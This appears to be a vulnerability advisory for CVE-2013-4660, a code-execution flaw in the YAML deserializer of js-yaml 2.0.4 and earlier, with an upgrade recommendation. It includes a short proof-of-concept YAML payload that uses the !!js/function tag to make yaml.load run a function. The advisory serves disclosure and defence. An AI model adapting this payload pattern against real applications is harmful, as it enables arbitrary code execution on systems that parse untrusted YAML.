CVE-2013-4660

EPSS 64.5%

Deserialization Code Execution in js-yaml

Published: 10/24/2017
Modified: 11/8/2023

Description

Versions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer.

## Proof of Concept

```
const yaml = require('js-yaml');
const x = `test: !!js/function > function f() { console.log(1); }();`
yaml.load(x);
```

## Recommendation

Update js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.

Affected packages (1)

References (4)